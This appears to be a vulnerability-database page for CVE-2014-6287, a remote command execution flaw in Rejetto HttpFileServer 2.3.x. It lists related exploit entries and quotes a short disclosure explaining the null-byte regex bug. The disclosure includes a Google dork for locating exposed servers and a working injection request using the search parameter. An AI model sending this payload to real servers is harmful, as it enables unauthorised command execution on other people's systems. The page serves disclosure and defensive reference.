| Reporter | Title | Published | Views | Family All 42 |
|---|---|---|---|---|
| Exploit for Code Injection in Rejetto Http_File_Server | 25 Jan 202622:51 | – | githubexploit | |
| Exploit for Code Injection in Rejetto Http_File_Server | 16 May 202623:24 | – | githubexploit | |
| Exploit for Code Injection in Rejetto Http_File_Server | 10 Mar 202615:31 | – | githubexploit | |
| Exploit for Code Injection in Rejetto Http_File_Server | 16 Sep 202517:44 | – | githubexploit | |
| HttpFileServer 2.3.x Remote Command Execution Vulnerability | 13 Sep 201400:00 | – | zdt | |
| Rejetto HttpFileServer Remote Command Execution Exploit | 9 Oct 201400:00 | – | zdt | |
| Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | 4 Jan 201600:00 | – | zdt | |
| HFS Http File Server 2.3.x - Remote Command Execution Exploit (3) | 23 Feb 202100:00 | – | zdt | |
| CVE-2014-6287 | 7 Oct 201400:00 | – | attackerkb | |
| CVE-2014-6287 | 15 Sep 201400:00 | – | circl |
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to
http://localhost:80/?search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen.
## EDB Note: This vulnerability will run the payload multiple times simultaneously.
## Make sure to take this into consideration when crafting your payload (and/or listener).Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation